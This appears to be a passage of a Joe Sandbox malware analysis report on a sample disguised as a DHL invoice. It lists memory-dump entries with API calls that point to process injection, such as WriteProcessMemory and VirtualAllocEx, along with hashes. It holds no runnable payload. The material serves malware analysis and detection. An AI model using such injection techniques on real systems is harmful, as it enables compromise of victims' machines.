                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $^q
                                                                                                                • API String ID: 0-388095546
                                                                                                                • Opcode ID: 2387de1177973e2a948a201f1a5d97e983f503b736c03d9a5398df0807d71bf3
                                                                                                                • Instruction ID: ca9981537642b4a3037d5ee5cd0a5f6790dd3a20d841551827dbb7ea36593e57
                                                                                                                • Opcode Fuzzy Hash: 2387de1177973e2a948a201f1a5d97e983f503b736c03d9a5398df0807d71bf3
                                                                                                                • Instruction Fuzzy Hash: 41D10E727042268FDB24EF6AC45577EBAF6FF84300F148869E586EB391DA38D9408B51
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 052E0980
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: 959fac4208a1135156b20e8660e9850db7d72fcad2ad3e3a6b5fac4073ea4bb7
                                                                                                                • Instruction ID: ec1c83d2cc7cf1110b1029da98cdccb9c7182882c973fb768993d4591ff1a7a4
                                                                                                                • Opcode Fuzzy Hash: 959fac4208a1135156b20e8660e9850db7d72fcad2ad3e3a6b5fac4073ea4bb7
                                                                                                                • Instruction Fuzzy Hash: ED2136B19003599FDB10DFA9C885BDEBBF5FF48320F50842AE959A7250C778A944CFA4
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0539041C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: a38a19d391099775bbb0232d13338e12fa5fc1063c45b731d0878d382fa3ccaf
                                                                                                                • Instruction ID: c0d5edf02c1d66eecd87a4be95291dc0c59faa4a96037c5e752542b2d070ddfb
                                                                                                                • Opcode Fuzzy Hash: a38a19d391099775bbb0232d13338e12fa5fc1063c45b731d0878d382fa3ccaf
                                                                                                                • Instruction Fuzzy Hash: 5C2127B19002499FCB14DFAAC844ADFFBF5EF48320F14842AD459A7210C778A944CFA0
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 0539041C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: d73437ac48daffc97651b68165f2998f22eaaf9a2950e9cefbaab32e43992281
                                                                                                                • Instruction ID: 4b7952d67402a303720b52cb53177b0e8be7b6a0e843549cd2b8dde6ad006871
                                                                                                                • Opcode Fuzzy Hash: d73437ac48daffc97651b68165f2998f22eaaf9a2950e9cefbaab32e43992281
                                                                                                                • Instruction Fuzzy Hash: 651124B19002498FCB14DFAAC844ADEFBF4EF48320F10842AD419A7210C774A944CFA0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 78451d7090add73b37c2c8458bf550b465145337e8f509bb77c707e9122f7156
                                                                                                                • Instruction ID: 963483a6a2f632c688b029f6915b08f1fb5817f57c4cbdc4042782702bb97e60
                                                                                                                • Opcode Fuzzy Hash: 78451d7090add73b37c2c8458bf550b465145337e8f509bb77c707e9122f7156
                                                                                                                • Instruction Fuzzy Hash: 5D113AB19002598FDB10DFAAC4457EEFFF8AB48324F14841AD455A7250CA38A944CBA4
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: fe7f0a464bb1b24ab2f91e75be57373b115c7d0d8ed53db30a61fc6d92543950
                                                                                                                • Instruction ID: 3f6b23129f157e906d097d2761f8970ab4ecffada92a53605275a1807eb1e0a6
                                                                                                                • Opcode Fuzzy Hash: fe7f0a464bb1b24ab2f91e75be57373b115c7d0d8ed53db30a61fc6d92543950
                                                                                                                • Instruction Fuzzy Hash: 481149B19003598FDB10DFAAC4447EFFFF8AB88324F24842AD455A7250CB38A944CFA4
                                                                                                                APIs
                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 052E06B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: fd2d5c23a6236ca14c5bdfbf8cfa3f7d8893df601465c8eb7817790ce686c08d
                                                                                                                • Instruction ID: 2d58f3f2b24f11d2befa9de12c17403b6dbe5ed616567b84c25c0b97bec19d3f
                                                                                                                • Opcode Fuzzy Hash: fd2d5c23a6236ca14c5bdfbf8cfa3f7d8893df601465c8eb7817790ce686c08d
                                                                                                                • Instruction Fuzzy Hash: A91123B29002499FCB10DFAAC844BDEBFF5EF88324F248419E559A7250C775A944CFA4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,bq
                                                                                                                • API String ID: 0-2474004448
                                                                                                                • Opcode ID: 22008ff14a10a5ced133415404452b6e148ac524eec87d8d71c1222c8c354a90
                                                                                                                • Instruction ID: dc4d9fa7af2994411dbb6e9a0a283f555270796c17da8b2c27eb4d220f34bc40
                                                                                                                • Opcode Fuzzy Hash: 22008ff14a10a5ced133415404452b6e148ac524eec87d8d71c1222c8c354a90
                                                                                                                • Instruction Fuzzy Hash: 6EC17275A002288FDB14DF68C945BEDBBF6BF88700F158499E509AB365CA30DD81CF60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,bq
                                                                                                                • API String ID: 0-2474004448
                                                                                                                • Opcode ID: f5b7cde43d0eb3ae714b4f6a7f4e5e59c9ac3e2766cddb693c4d9b5c54190450
                                                                                                                • Instruction ID: f62420cd75e6ddf2ad5c996e9e2f8c96ee752a2045b20900b46121323e306979
                                                                                                                • Opcode Fuzzy Hash: f5b7cde43d0eb3ae714b4f6a7f4e5e59c9ac3e2766cddb693c4d9b5c54190450
                                                                                                                • Instruction Fuzzy Hash: 53C16F75A002288FDB18DB68C945BEDBBF6BF88700F158499E509AB365DA30DD81CF61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Pl^q
                                                                                                                • API String ID: 0-2831078282
                                                                                                                • Opcode ID: e973a0a64358c242360caabeaf3e45907f752f45ecdb378b08fcd154dc53a674
                                                                                                                • Instruction ID: cc918f516257f1817ab8c406510cf44f448acb7e7ad355ea6b47c22451a008ab
                                                                                                                • Opcode Fuzzy Hash: e973a0a64358c242360caabeaf3e45907f752f45ecdb378b08fcd154dc53a674
                                                                                                                • Instruction Fuzzy Hash: A6912434B006188FCB14DF69C884A6A7BF6BF89700B1584A9E505DF3B5DB71ED41CBA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q
                                                                                                                • API String ID: 0-1614139903
                                                                                                                • Opcode ID: e7fdb5a4fd1809f3ffcd085ff89529c4017ef2c44a52b2a067b5914d238dd171
                                                                                                                • Instruction ID: eb56d2fb5744d0b0964aaf31e0c43285f5678b07731e6eb90dd631b75e88257a
                                                                                                                • Opcode Fuzzy Hash: e7fdb5a4fd1809f3ffcd085ff89529c4017ef2c44a52b2a067b5914d238dd171
                                                                                                                • Instruction Fuzzy Hash: BEA1C834A10218DFCB14DFA4D898A9DBBB6BF88300F558559E406AB364DF30ED42CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (bq
                                                                                                                • API String ID: 0-149360118
                                                                                                                • Opcode ID: 9380809829a8f793792ca0d2a055658ee2d4a6807261af54c37654afe833c74a
                                                                                                                • Instruction ID: 2370f8efd495de468af253216e071475cdd49c0f7ec879826addee4fa15d8e97
                                                                                                                • Opcode Fuzzy Hash: 9380809829a8f793792ca0d2a055658ee2d4a6807261af54c37654afe833c74a
                                                                                                                • Instruction Fuzzy Hash: 2F41B2357041648FCB54DF39C854A7E3BEABF9971071584A9E44ADB3A1CE34DE029B90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q
                                                                                                                • API String ID: 0-1614139903
                                                                                                                • Opcode ID: ed991801d2ebe7aac9239e20494963009a1cac6528bcd08c8ab4c3d886e865f3
                                                                                                                • Instruction ID: ec2cbc5533bd922aba9ddc09f8075942937093a4c5652db0467e05a67268dff4
                                                                                                                • Opcode Fuzzy Hash: ed991801d2ebe7aac9239e20494963009a1cac6528bcd08c8ab4c3d886e865f3
                                                                                                                • Instruction Fuzzy Hash: D2415634B206249FCB14FB68C898A6E77BBBFC9700F504419D406AB394DF74AC46DB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049813348.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_53c0000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q
                                                                                                                • API String ID: 0-1614139903
                                                                                                                • Opcode ID: 1b5e9551c6fef7862af412fccf006029503109be2fa615c1814ec413458914fe
                                                                                                                • Instruction ID: 39cdc212c584d7ee8f0911343144ea11c7f271be68172de8affaeac551ba0efa
                                                                                                                • Opcode Fuzzy Hash: 1b5e9551c6fef7862af412fccf006029503109be2fa615c1814ec413458914fe
                                                                                                                • Instruction Fuzzy Hash: 67414938D08208CFCB25CFA9D4496BEBFB6BB46201F1081EEE096A3652C7745E85DF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: pbq
                                                                                                                • API String ID: 0-3896149868
                                                                                                                • Opcode ID: a926e17d876ffbd4b293c3e67c0d34711c8e92f17d148e31d827d0cd5f8a52cb
                                                                                                                • Instruction ID: 0385a9aff4b752d87b38dc9c492755961424bd2c696eab3b26f63ea7098f9e1b
                                                                                                                • Opcode Fuzzy Hash: a926e17d876ffbd4b293c3e67c0d34711c8e92f17d148e31d827d0cd5f8a52cb
                                                                                                                • Instruction Fuzzy Hash: 0241D876640100AFCB4A9FA8C954D557BF7FF8C3147168494E2099B276DA32DC22EB50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: pbq
                                                                                                                • API String ID: 0-3896149868
                                                                                                                • Opcode ID: d05d1eecc2de15dd57b3317e1a79ff6a427ef38be41c553d636a90e2e2fcb138
                                                                                                                • Instruction ID: 1e476e400238142685f107fdcb31fd055e141106b834af9ea3570cd330bf3afa
                                                                                                                • Opcode Fuzzy Hash: d05d1eecc2de15dd57b3317e1a79ff6a427ef38be41c553d636a90e2e2fcb138
                                                                                                                • Instruction Fuzzy Hash: E041C776640100AFCB4A9FA8C954D597BF7FF8C3147168498E2099B276DA32DC22EB51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,bq
                                                                                                                • API String ID: 0-2474004448
                                                                                                                • Opcode ID: e0df1ab45d27cb61837b97cc1cfffc39175cfd8be52d15869ffe3f94edd96339
                                                                                                                • Instruction ID: caa48de620a6817daacd0fcfdd5339f827253f86a7cc65188fa27c13c80b9aaf
                                                                                                                • Opcode Fuzzy Hash: e0df1ab45d27cb61837b97cc1cfffc39175cfd8be52d15869ffe3f94edd96339
                                                                                                                • Instruction Fuzzy Hash: E641BC357001158FCB04DF69D8909AEBBF2FF89311B11846AE906DB361CB31ED41CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %
                                                                                                                • API String ID: 0-2567322570
                                                                                                                • Opcode ID: a5cd1679c288fbd7dbe7628a7cc9063185a74b9204756fa9663c002eaacd6fd2
                                                                                                                • Instruction ID: 69ac3b04abe17bfec10d62eaa5924d3a1f3d3bb79f466ffb2d223c72ae395534
                                                                                                                • Opcode Fuzzy Hash: a5cd1679c288fbd7dbe7628a7cc9063185a74b9204756fa9663c002eaacd6fd2
                                                                                                                • Instruction Fuzzy Hash: 79511A70D54228CFEB68DF69C84879DBBB5BF48300F0085AAD80AA7354DB705AC5CF91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q
                                                                                                                • API String ID: 0-1614139903
                                                                                                                • Opcode ID: 1eee8667f7e2f70ec2e79cd921793e2c2b7a400d5e6f8c87ce15adb4bf24016d
                                                                                                                • Instruction ID: db40f5620d4ed87dcc8a395259c796476af1d06bb32772d2e10cbcf7c76a19a2
                                                                                                                • Opcode Fuzzy Hash: 1eee8667f7e2f70ec2e79cd921793e2c2b7a400d5e6f8c87ce15adb4bf24016d
                                                                                                                • Instruction Fuzzy Hash: 5D416D353406149FD318DB28C969F2B7BEAABC8710F104968E10ACB3A5CE75EC42CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q
                                                                                                                • API String ID: 0-1614139903
                                                                                                                • Opcode ID: 320c21e809d5f322631f7615760e3a3a6c210c05010ef9dee577c124c26b0622
                                                                                                                • Instruction ID: a057a7150b4e4466810d091dd0122bb06b3adb832fd6af78a09c29fc69408ce7
                                                                                                                • Opcode Fuzzy Hash: 320c21e809d5f322631f7615760e3a3a6c210c05010ef9dee577c124c26b0622
                                                                                                                • Instruction Fuzzy Hash: EE314C357406149FD318DB68C5A9F2A77EABBCC710F104968E50ACB3A5DE71EC42CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q
                                                                                                                • API String ID: 0-1614139903
                                                                                                                • Opcode ID: befcc1fe6a889a07a6e813d5bbca5cb27d9f5eff68a89673c63db6b96eb6663d
                                                                                                                • Instruction ID: e1c7347e2227d8f9b442bd706bb9e72ac7f07aa95753251fe6baabdb22427796
                                                                                                                • Opcode Fuzzy Hash: befcc1fe6a889a07a6e813d5bbca5cb27d9f5eff68a89673c63db6b96eb6663d
                                                                                                                • Instruction Fuzzy Hash: 6D31D2367101089FCF148FA4C894E5ABBB7FF8C310B0544A9E90A9B365CA32EC12DB51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: p<^q
                                                                                                                • API String ID: 0-1680888324
                                                                                                                • Opcode ID: 772925ec308e82bff791a43529d7ae9f0f4dd2855e06f475f931a079f0290b79
                                                                                                                • Instruction ID: 20ac1c185fb92f773dd4bb8f987d5835014cfd7d6bd5f3836107b0d21d49ac87
                                                                                                                • Opcode Fuzzy Hash: 772925ec308e82bff791a43529d7ae9f0f4dd2855e06f475f931a079f0290b79
                                                                                                                • Instruction Fuzzy Hash: 24215E713041549FCB15DF2AC854AAA7BF6FF8A210B054495F84ACB361DA35DD91CB30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: p<^q
                                                                                                                • API String ID: 0-1680888324
                                                                                                                • Opcode ID: 8e7cde0520889b66232d80de0a5266450c6172c96b344c235ad1c7e82ff7a8e1
                                                                                                                • Instruction ID: c741822b1ed7afa2df805aacb9c4f2d11cfa31d3bd014b78ababdf08fd5ef9f4
                                                                                                                • Opcode Fuzzy Hash: 8e7cde0520889b66232d80de0a5266450c6172c96b344c235ad1c7e82ff7a8e1
                                                                                                                • Instruction Fuzzy Hash: 902149713041649FCB15DF2AC844AAA7BEAFF89210F0544A5FC4ACB361CA35DD91CB70
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q
                                                                                                                • API String ID: 0-671973202
                                                                                                                • Opcode ID: 618c490894d70860b21acb3e02e413d65c08d00e4bf85f3e66b14ef7ee670b7a
                                                                                                                • Instruction ID: 270b8811b1721308bbf5e32f965b17e5d91f22fd591c3478b56d4a2bf02eb245
                                                                                                                • Opcode Fuzzy Hash: 618c490894d70860b21acb3e02e413d65c08d00e4bf85f3e66b14ef7ee670b7a
                                                                                                                • Instruction Fuzzy Hash: F8217C30A04204DFDB15AB78C465AADBAF2AFC9301F20852DD446AB395DF754846CB56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,bq
                                                                                                                • API String ID: 0-2474004448
                                                                                                                • Opcode ID: 11a379aa76b9cc6a44c2f81d44a88156bf8b518a104f5ad6f2f7d6d90ddb027a
                                                                                                                • Instruction ID: 2e985fa5496a74c1fdf228adb6df38a4c3ecb71f74752fdea7004519e6615137
                                                                                                                • Opcode Fuzzy Hash: 11a379aa76b9cc6a44c2f81d44a88156bf8b518a104f5ad6f2f7d6d90ddb027a
                                                                                                                • Instruction Fuzzy Hash: 87119035B001558FCB05DF68C994A6EBBB2BF85301B1580A6E901DB3A5D731ED41CB91
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 053913FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 211efda711b57053c9d8eeb31f5d2a8f7b075f0157a0f4da797d7399d7ab9c50
                                                                                                                • Instruction ID: 300cc8eb63e13b4758004963f8fa9f2f166d0016621fec76707709872b47ef51
                                                                                                                • Opcode Fuzzy Hash: 211efda711b57053c9d8eeb31f5d2a8f7b075f0157a0f4da797d7399d7ab9c50
                                                                                                                • Instruction Fuzzy Hash: B61167B28002498FCB10DFAAC845BDFFBF5EF88324F248429E459A7210C775A544CF94
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?), ref: 053913FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4275171209-0
                                                                                                                • Opcode ID: 5649fe1c41705398a4bee3c6dba3f9efc318275594024714926792c97d8e0ea0
                                                                                                                • Instruction ID: 5afa636d7c31b4f25683dadf63bdf8ed0dcdcefc95124c4396336f699c3336f8
                                                                                                                • Opcode Fuzzy Hash: 5649fe1c41705398a4bee3c6dba3f9efc318275594024714926792c97d8e0ea0
                                                                                                                • Instruction Fuzzy Hash: 521134B19002498FDB14DFAAC844BEFFBF5EB88320F208429E459A7250C775A544CFA4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q
                                                                                                                • API String ID: 0-671973202
                                                                                                                • Opcode ID: 80ddd6fc0894c25f6bb4a13d746890eccb18965d5b34e6cf85d08e76a04a7b5e
                                                                                                                • Instruction ID: 1600c76e45f23ab058ecf1856334eff095386d89689cca2fbdfbaec1ea8f378e
                                                                                                                • Opcode Fuzzy Hash: 80ddd6fc0894c25f6bb4a13d746890eccb18965d5b34e6cf85d08e76a04a7b5e
                                                                                                                • Instruction Fuzzy Hash: 5D111530B00214CFDB45AB78C559BADB6F2BFC9701F248829D806AB3A5CF758945CB96
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: tocq
                                                                                                                • API String ID: 0-4013956356
                                                                                                                • Opcode ID: c70bfbcfd1546bb1caf39749eaf8d6c9023fb76d14c4c5edbc8c68a4e16d467c
                                                                                                                • Instruction ID: 45ec444678186fad27d73273d1a5251ec158b335d3b92a69a342ae541bf45dcd
                                                                                                                • Opcode Fuzzy Hash: c70bfbcfd1546bb1caf39749eaf8d6c9023fb76d14c4c5edbc8c68a4e16d467c
                                                                                                                • Instruction Fuzzy Hash: 0D11E270B50219DFCB54DB68E998F6E7BF2BB88701F144469E506EB3A0CB749C44DB50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: w
                                                                                                                • API String ID: 0-476252946
                                                                                                                • Opcode ID: 5c464f83cf5f28dbe997d9300beb46cca6bb37afcad1ddd6cefba9a86817c812
